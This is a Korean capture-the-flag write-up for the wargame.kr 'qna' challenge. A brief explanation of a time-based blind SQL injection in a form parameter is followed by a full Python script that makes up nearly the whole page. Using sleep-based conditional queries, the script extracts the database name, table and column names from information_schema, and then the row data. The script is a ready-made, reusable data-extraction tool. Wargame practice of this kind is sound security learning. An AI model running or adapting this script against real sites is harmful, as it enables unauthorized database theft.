[Wargame.kr] challenge qna (time base blind SQL) 본문
Wargame WriteUp/WarGame.kr
[Wargame.kr] challenge qna (time base blind SQL)
Dyrandy 2018. 11. 13. 16:29wargame.kr challenge qna
time base blind sql injection 이라는 것을 알 수 있다.
일단 to JSMaster이면 먼가 보내는것 같아 저기가 유력해보여, 공격을 해봅니다.
버프로 잡아보면,
위와 같은 파라미터가 나온다.
이렇게 sql 구문을 사용하여 넣어보면 5초 뒤에 화면이 나온다.
# !/usr/bin/env python # wolfgang class bcolors: BLACK = '\033[95m' OKBLUE = '\033[94m' OKGREEN = '\033[92m' WARNING = '\033[93m' RED = '\033[91m' ENDC = '\033[0m' BOLD = '\033[1m' UNDERLINE = '\033[4m' print bcolors.RED + "Made By: " print " _ __ ____________ " print "| | / /___ / / __/ ____/___ _____ ____ _" print "| | /| / / __ \/ / /_/ / __/ __ `/ __ \/ __ `/" print "| |/ |/ / /_/ / / __/ /_/ / /_/ / / / / /_/ / " print "|__/|__/\____/_/_/ \____/\__,_/_/ /_/\__, / " print " /____/ " print " " + bcolors.ENDC import requests from selenium import webdriver from pwn import * import sys import time ''' #Time Example t= time.time() time.sleep(2) t2 = time.time() spendtime = t2 - t print("Before timestamp: ", t) print("After timestamp: ", t2) print("Wait {0} seconds".format(spendtime)) ''' table = "wqertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890{}!@#$%^&*()-=_+[];'<>?/.,~`" table2 = "abcdefghijklmnopqrstuvwxyz0123456789" #Basic Input URL = "http://wargame.kr:8080/qna/?page=to_jsmaster" COOKIE = "" #SUCCESS = "2018" #Parameter para1 = "cont" para2 = "mail" para3 = "type" #Check print bcolors.WARNING + "[*] The URL which you wish to attack: " + bcolors.ENDC print bcolors.OKBLUE + "[+] " + URL + bcolors.ENDC print bcolors.WARNING + "[*] Your Cookie / Session: " + bcolors.ENDC print bcolors.OKBLUE + "[+] " + COOKIE + bcolors.ENDC #print bcolors.WARNING + "[*] If Successful, Text String: " + bcolors.ENDC #print bcolors.OKBLUE + "[+] " + SUCCESS + bcolors.ENDC print bcolors.WARNING + "[*] Database Search(to skip '0', numbers only): " + bcolors.ENDC is_skip = input("[>] ") if is_skip != 0: d = log.progress("Database Length") d.status("Hacking...") for i in range(100): query = "if(length(database())="+str(i)+", sleep(5), 1)" data = {para1: "123", para2:"guest", para3:query} t = time.time() res = requests.post(URL, data=data) #time.sleep(2) t2 = time.time() spendtime = t2 - t #print spendtime if spendtime > 4: print bcolors.OKGREEN + "[+] Database Length: " + str(i) + bcolors.ENDC d.success() db_len = i break db_name = "" if is_skip != 0: d = log.progress("Database Name") d.status("Hacking...") sys.stdout.write("[*] ") for i in range(1, db_len+1): for j in table: query = "if(ascii(substring((select database()),"+str(i)+",1))="+str(ord(j))+", sleep(10),1)" data = {para1:"asd", para2:"guest", para3:query} t = time.time() res = requests.post(URL, data=data) #time.sleep(2) t2 = time.time() spendtime = t2 - t #print spendtime if spendtime > 8: db_name += j sys.stdout.write(str(j)) break d.success() print " " print bcolors.OKGREEN + "[+] Database Name: " + db_name + bcolors.ENDC print bcolors.WARNING + "[*] Table Search(to skip '0', numbers only): " + bcolors.ENDC is_skip = input("[>] ") table_num = 0 if is_skip != 0: d = log.progress("Number Of Tables") d.status("Hacking...") for i in range (0, 1000): query = "if((select count(table_name) from information_schema.tables where table_type=0x62617365207461626c65)="+str(i)+",sleep(5),1)" data = {para1:"asd", para2:"guest", para3:query} t = time.time() res = requests.post(URL, data=data) #time.sleep(2) t2 = time.time() spendtime = t2 - t if spendtime > 4: print bcolors.OKGREEN + "[+] Number Of Tables: " + str(i) + bcolors.ENDC table_num = i d.success() break table_len = [] if is_skip != 0: d = log.progress("Length Of Tables") d.status("Hacking...") for i in range (0, table_num): for j in range (0, 10000): query = "if((select length(table_name) from information_schema.tables where table_type=0x62617365207461626c65 limit "+str(i)+",1)="+str(j)+",sleep(5),1)" data = {para1:"asd", para2:"guest", para3:query} t = time.time() res = requests.post(URL, data=data) #time.sleep(2) t2 = time.time() spendtime = t2 - t if spendtime > 4: print bcolors.OKGREEN + "[+]["+str(i)+"] Length Of Tables: " + str(j) + bcolors.ENDC table_len.append(j) break d.success() table_name = [] tn = "" if is_skip != 0: d = log.progress("Name Of Tables") d.status("Hacking...") for i in range (0, table_num): limit = table_len[i] sys.stdout.write("["+str(i)+"] ") for j in range (1, limit+1): for k in table: query = "if(ascii(substring((select table_name from information_schema.tables where table_type=0x62617365207461626c65 limit "+str(i)+",1),"+str(j)+",1))="+str(ord(k))+",sleep(5), 1)" data = {para1:"asd", para2:"guest", para3:query} t = time.time() res = requests.post(URL, data=data) #time.sleep(2) t2 = time.time() spendtime = t2 - t if spendtime > 4: sys.stdout.write(str(k)) tn += k break print " " table_name.append(tn) print bcolors.OKGREEN + "[+]["+str(i)+"] Name Of Tables: " + tn + bcolors.ENDC tn = "" d.success() if is_skip == 0: Search_Name = raw_input("[*] Input The Table Name: ") Search_Name = Search_Name[:-1] else: num = int(input("[*] Input The Table Number: ")) Search_Name = table_name[num] print bcolors.WARNING + "[*] Column Search(to skip '0', numbers only): " + bcolors.ENDC is_skip = input("[>] ") #print "0x" + Search_Name[:-1].encode('hex') # how to erase linefeed if is_skip != 0: d = log.progress("Number Of Columns") d.status("Hacking...") for i in range (0, 1000): query = "if((select count(column_name) from information_schema.columns where table_name=0x"+Search_Name.encode('hex')+")="+str(i)+",sleep(5),1)" data = {para1:"asd", para2:"guest", para3:query} t = time.time() res = requests.post(URL, data=data) #time.sleep(2) t2 = time.time() spendtime = t2 - t if spendtime > 4: print bcolors.OKGREEN + "[+] Number Of Columns: " + str(i) + bcolors.ENDC column_num = i d.success() break column_len = [] if is_skip != 0: d = log.progress("Length Of Columns") d.status("Hacking...") for i in range (0, column_num): for j in range (0, 100): query = "if((select length(column_name) from information_schema.columns where table_name=0x"+Search_Name.encode('hex')+" limit "+str(i)+",1)="+str(j)+",sleep(5),1)" data = {para1:"asd", para2:"guest", para3:query} t = time.time() res = requests.post(URL, data=data) #time.sleep(2) t2 = time.time() spendtime = t2 - t if spendtime > 4: print bcolors.OKGREEN + "[+]["+str(i)+"] Length Of Columns: " + str(j) + bcolors.ENDC column_len.append(j) break d.success() column_name = [] cn = "" if is_skip != 0: d = log.progress("Name Of Columns") d.status("Hacking...") for i in range (0, column_num): limit = column_len[i] sys.stdout.write("["+str(i)+"] ") for j in range (1, limit+1): for k in table: query = "if(ascii(substring((select column_name from information_schema.columns where table_name=0x"+Search_Name.encode('hex')+" limit "+str(i)+",1),"+str(j)+",1))="+str(ord(k))+",sleep(5), 1)" data = {para1:"asd", para2:"guest", para3:query} t = time.time() res = requests.post(URL, data=data) #time.sleep(2) t2 = time.time() spendtime = t2 - t if spendtime > 4: sys.stdout.write(str(k)) cn += k break print " " column_name.append(cn) print bcolors.OKGREEN + "[+]["+str(i)+"] Name Of Columns: " + cn + bcolors.ENDC cn = "" d.success() if is_skip == 0: Search_Name_C = raw_input("[*] Input The Column Name: ") Search_Name_C = Search_Name_C[:-1] else: num = int(input("[*] Input The Column Number: ")) Search_Name_C = column_name[num] print bcolors.WARNING + "[*] Data Search " + bcolors.ENDC d = log.progress("Number Of Datas") d.status("Hacking...") for i in range (0, 1000): query = "if((select count("+Search_Name_C+") from "+Search_Name+")="+str(i)+",sleep(5),1)" data = {para1:"asd", para2:"guest", para3:query} t = time.time() res = requests.post(URL, data=data) #time.sleep(2) t2 = time.time() spendtime = t2 - t if spendtime > 4: print bcolors.OKGREEN + "[+] Number Of Datas: " + str(i) + bcolors.ENDC data_num = i d.success() break data_len = [] d = log.progress("Length Of Datas") d.status("Hacking...") for i in range (0, data_num): for j in range (0, 100): query = "if((select length("+Search_Name_C+") from "+Search_Name+" limit "+str(i)+",1)="+str(j)+",sleep(5),1)" data = {para1:"asd", para2:"guest", para3:query} t = time.time() res = requests.post(URL, data=data) #time.sleep(2) t2 = time.time() spendtime = t2 - t if spendtime > 4: print bcolors.OKGREEN + "[+]["+str(i)+"] Length Of Datas: " + str(j) + bcolors.ENDC data_len.append(j) break d.success() data_name = [] dn = "" d = log.progress("Value Of Datas") d.status("Hacking...") for i in range (0, data_num): limit = data_len[i] sys.stdout.write("["+str(i)+"] ") for j in range (1, limit+1): for k in table2: query = "if(ascii(substring((select "+Search_Name_C+" from "+Search_Name+" limit "+str(i)+",1),"+str(j)+",1))="+str(ord(k))+",sleep(10), 1)" data = {para1:"asd", para2:"guest", para3:query} t = time.time() res = requests.post(URL, data=data) #time.sleep(2) t2 = time.time() spendtime = t2 - t if spendtime > 9: sys.stdout.write(str(k)) dn += k break print " " data_name.append(dn) print bcolors.OKGREEN + "[+]["+str(i)+"] Value Of Datas: " + dn + bcolors.ENDC dn = "" d.success()
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